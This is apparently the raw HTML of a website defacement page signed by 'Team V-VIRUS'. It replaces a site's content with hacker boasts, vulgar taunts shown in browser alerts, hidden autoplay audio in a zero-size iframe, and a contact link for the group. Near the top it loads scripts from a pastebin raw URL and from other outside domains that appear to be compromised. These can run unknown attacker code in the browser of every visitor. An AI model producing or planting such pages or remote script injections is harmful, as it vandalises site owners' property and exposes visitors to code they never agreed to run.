

<!DOCTYPE html> <html lang="en"><iframe width="0" heightt="0" src="https://h.top4top.io/m_1671j22xk9.mp3" frameborder="0" allow fullscreen></iframe> <head><title> Hacked By Team V-VIRUS </title></head><meta property="og:image" content="https://i.ibb.co/P6Z9K2w/20200426-112316.png" /> <meta property="og:title" content="TEAM V-VIRUS" /> <meta property="og:description" content="WEBSITE FUCKED BY TEAM V-VIRUS. TEAM V-VIRUS is illussion "/> <link rel="shortcut icon" href="https://i.ibb.co/P6Z9K2w/20200426-112316.png" type="image/x-icon" /> <link href='http://fonts.googleapis.com/css?family=Rancho' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<script src="https://pastebin.com/raw/8v6kQfn5"></script>
<script src="https://cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek%20salju.js" type="text/javascript"></script>
<script src="http://butterflypeaflower.com/js/Mr.Phantom%20H-9x%20h05T.js"></script>


  <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
        <script src="http://www.ctwood.com.sg/style/alert.js" ></script>

<style>
p {
box-sizing: border-box;
margin: 1em auto;
line-heightt:3%;
background-color:black;
outline: inset 11px green;
padding: 0.55em;
max-width: 200em;
width: 100%;
font: 700 0.65em Rancho ;
counter-increment: c;
}

.kedip {
-webkit-animation-name: blinker;
-webkit-animation-duration: 3s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 1s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 1s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;

 color: white;
}

@-moz-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@-webkit-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

.bounce {
  position: relative;
  animation: bounce 1s ease-in 2s 1000 alternate none;
}
@keyframes bounce {
	from {
	  top: 0px;
	  left: 0px;
	  }
	to {
	  top: 100px;
	  bottom: 20px;
	}
}
</style>
<script language="JavaScript" type="text/javascript">
var speed=100;
var raincol=new Array("#ff0000", "#ff9900", "#ffff00", "#99ff00", "#00ff00", "#00ff99", "#00ffff", "#0099ff", "#0000ff", "#9900ff", "#ff00ff", "#ff0099");
var rainbow, raintxt, raincnt=0;
window.onload=function() { if (document.getElementById) {
  var i, raini;
  rainbow=document.getElementById("rainbow");
  raintxt=rainbow.firstChild.nodeValue;
  while (rainbow.childNodes.length) rainbow.removeChild(rainbow.childNodes[0]);
  for (i=0; i<raintxt.length; i++) {
    raini=document.createElement("span");
    raini.setAttribute("id", "rain"+i);
    raini.appendChild(document.createTextNode(raintxt.charAt(i)));
    rainbow.appendChild(raini);}
rainbow=setInterval ("raining()", speed);}}
function raining() {
  for (var i=0; i<raintxt.length; i++) document.getElementById("rain"+i).style.color=raincol[(i+raincnt)%raincol.length];
  raincnt++;
}

if(typeof jQuery=='undefined'){document.write('<'+'script');document.write(' language="javascript"');document.write(' type="text/javascript"');document.write(' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">');document.write('</'+'script'+'>')}</script><script>if(!image_urls){var image_urls=Array()}if(!flash_urls){var flash_urls=Array()}image_urls['rain1']="http://2.bp.blogspot.com/-IQXNv-_CBLE/TpWcK7LL4VI/AAAAAAAAG0I/bcxYcqc_uI0/pinkpetal1.png";image_urls['rain2']="http://4.bp.blogspot.com/-teXCIicWPF4/TpWcLLg0A2I/AAAAAAAAG0U/IPPCr1gponc/pinkpetal2.png";image_urls['rain3']="http://3.bp.blogspot.com/-3JG9HLECCRU/TpWcLZGSYtI/AAAAAAAAG0g/zIJINua93TE/redpetal1.png";image_urls['rain4']="http://2.bp.blogspot.com/-BByhQEK5E24/TpWcLux4xRI/AAAAAAAAG0s/x2hIr1AV_Ac/redpetal2.png";$(document).ready(function(){var c=$(window).width();var d=$(window).heightt();var e=function(a,b){return Math.round(a+(Math.random()*(b-a)))};var f=function(a){setTimeout(function(){a.css({left:e(0,c)+'px',top:'-30px',display:'block',opacity:'0.'+e(10,100)}).animate({top:(d-10)+'px'},e(7500,8000),function(){$(this).fadeOut('slow',function(){f(a)})})},e(1,8000))};$('<div></div>').attr('id','rainDiv').css({position:'fixed',width:(c-20)+'px',heightt:'1px',left:'0px',top:'-5px',display:'block'}).appendTo('body');for(var i=1;i<=20;i++){var g=$('<img/>').attr('src',image_urls['rain'+e(1,4)]).css({position:'absolute',left:e(0,c)+'px',top:'-30px',display:'block',opacity:'0.'+e(10,100),'margin-left':0}).addClass('rainDrop').appendTo('#rainDiv');f(g);g=null};var h=0;var j=0;$(window).resize(function(){c=$(window).width();d=$(window).heightt()})});</script><script>if(typeof jQuery=='undefined'){document.write('<'+'script');document.write(' language="javascript"');document.write(' type="text/javascript"');document.write(' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">');document.write('</'+'script'+'>')}</script><script>$(document).ready(function(){var a=$('<img>').attr({'src':'http://3.bp.blogspot.com/-YF67t1KTSYM/VUbcnyOKqWI/AAAAAAAAF7M/SYa9YvoP2ZU/s1600/gambar-transparent.gif','border':0});$('<a></a>').css({position:'absolute',right:'0px',top:'22px','z-index':'90'}).append(a).appendTo('body')});</script> 

<style>
body {
  background-image: url('https://3.bp.blogspot.com/-5Ma3lIrkPCk/W5p-c6bBmsI/AAAAAAAAALw/Gh-OIZLSiJc3QRCyShSytMNAtpUQoSSXQCLcBGAs/s320/Gambar%2BAnimasi%2BPetir%2BBergerak%2BWallpaper%2BKilat%2BMerah%2BLuar%2BBiasa.gif');
  background-repeat: ;
  background-attachment: fixed;
  background-size: cover;
}
</style>
<body bgcolor="black">
<center><div class="kedip"><font face="Rancho">
<font color="red"> [!] <b>Hacked By [!] </font><h2><font color="white"> TEAM V-VIRUS <b></b></h2></div>
<img src="https://i.ibb.co/P6Z9K2w/20200426-112316.png" width="900" height="550"><font face="Iceland" size="11px" color="lime"><br><b>
<img src="http://bestanimations.com/Nature/Flora/Hemp/animated-hemp-marijuana-gif-6.gif" height="100px" width="100px"><font size="11px" color="yellow">[</font> VIRUS is illussion <font size="11px" color="yellow">]</font>
<img src="http://bestanimations.com/Nature/Flora/Hemp/animated-hemp-marijuana-gif-6.gif" height="100px" width="100px"><br><p><span id="rainbow">Your Site Don't have Required Security :( as a Warning We Hacked Your Site! Do not Get Butthurt. JUST CHiLL!</span></p><div class="kedip">
<center>
<img src="https://www.gambaranimasi.org/data/media/562/animasi-bergerak-garis-0390.gif"><br> 
<link href='http://fonts.googleapis.com/css?family=Cairo' rel='stylesheet' type='text/css'>
<font color="gold">Thanks Official Member</font></center></div>
<marquee style="border: green 3px solid" behavior="alternate" scrollamount="10" width="500">
<font size="15" color="gold">[||] ./2OT0L <font size="10" color="highlighter green">/ZHO </font> <font color="Red"> - Mr.Ti74N - ./PR0612 - BL@3K/6E21L </font></font></font></font></marquee> </div> <center>
<img src="https://www.gambaranimasi.org/data/media/562/animasi-bergerak-garis-0324.gif"><br> 
<img src="https://www.gambaranimasi.org/data/media/562/animasi-bergerak-garis-0324.gif"><br> 
</script><footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #FFFFFF; border-bottom: 1px solid #FFFFFF"><font color="Aqua" Face="shadows+Into+Light+Two">CONTACT US</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b><a href="https://WWW.FACEBOOK.COM/TEAMVVIRUS">WWW.FACEBOOK.COM/TEAMVVIRUS</a></b></marquee></font></html>
<script>alert("Website Fucked");</script>
<script>alert("YOUR DADDY TEAM V-VIRUS IS HERE");</script><div style="position: fixed; top: 75px; left: -225px; width: 600px; padding: 10px; font-size: 24px; text-align: center; color: white; font-family: 'trebuchet ms', verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: Transparent; border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><a href="" style="text-decoration:none;color:white;"> <marquee direction="left" scrollamount="6" width="50%" style="width: 50%;"> HACKED BY ./2OT0L B@21 </marquee></font></b> </div>
